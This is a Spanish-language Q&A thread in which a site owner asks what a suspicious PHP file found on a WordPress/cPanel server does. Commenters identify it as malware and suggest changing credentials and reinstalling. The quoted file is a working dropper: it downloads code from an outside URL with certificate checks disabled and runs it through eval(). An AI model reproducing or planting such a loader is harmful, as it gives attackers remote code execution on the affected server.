# Archivo Raro En Servidor

Tags: php, wordpress, curl

Hace 2 dias como sorpresa pudimos ver que en una de nuestras cuentas de Cpanel, se creo un archivo muy curioso y ajeno al Wordpress, con un nombre aleatorio y con un codigo raro.

Obviamente tuvimos que eliminarlo por cuestiones de seguridad, sin embargo me gustaria saber que hace exactamente este codigo en PHP.

Debo aclarar que al ejecutar el archivo, el antivirus reacciona.

```
function get_contents($url){ 
$ch = curl_init("$url");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_COOKIEJAR,$GLOBALS['coki']);
curl_setopt($ch, CURLOPT_COOKIEFILE,$GLOBALS['coki']);
$result = curl_exec($ch);
return $result;
}
$a = get_contents('http://ndot.us/za');
eval('?>'.$a);
```

Tambien aprovechar, hay alguna manera de saber el origen de los archivos?

Saludos!

Comment: *el antivirus reacciona*, obviamente es un [*malware*](https://es.m.wikipedia.org/wiki/Malware). Ahora, saber lo que hace sería complicado sin ejecutarlo y analizar el comportamiento, cosa que dudo mucho que alguien esté dispuesto a hacer. Te invito a leer [ask] y a realizar el [tour]. En mi opinión tu pregunta es *off-topic*, esperemos ver qué dice la comunidad. Saludos

Comment: No se exactamente lo que hace, pero veo que llama a una url que es un php. En el código hay accesos a bases de datos y forms y en fin, yo cambiaria todas las credenciales de acceso que tengas en el CPanel. O sea, todas, todas. Por prevención al menos.

Comment: >> Gracias Mauricio, siempre intento publicarlo de manera correcta, nose como puedo evitar una pregunta Off Topic, dado que no hay manera de agregar categoria e incluso algunas Tags que no me permite poner.

>> Si, manejo PHP, pero lo que no comprendo es como pudo haberse infiltrado dicho archivo, necesito saberlo para cubrir esos huecos de seguridad. Ya he cambiado las contraseñas.

Gracias a ambos.

Comment: Creo que leyendo la documentación de `curl` e intentando ingresar a la `url` se puede deducir que es y que hace. Sin duda tu hosting está expuesto

Comment: Alguna sugerencia de como evitar este tipo de ataques? en principio el servidor cuenta con las medidas de seguridad necesarias. pero no conozco a nivel profundo para ver aspectos mas detallados.

Comment: Wordpress es una maravilla, pero ¡ay de ti si te hackean un sitio manejado con Wordpress! Es complicadísimo saber por dónde entraron y más aún saber dónde te inyectaron código. Casi nunca el problema se resuelve borrando un solo archivo, pudieron haber alcanzado también la base de datos, las plantillas, los temas, etc. Te sugiero [esta respuesta](https://es.stackoverflow.com/a/215708/29967) donde he explicado algunas cosas desde mi experiencia. Lo cierto es que deberías considerar instalar todo desde cero y revisar la BD y los archivos de la carpeta `uploads`  para subirlos de nuevo.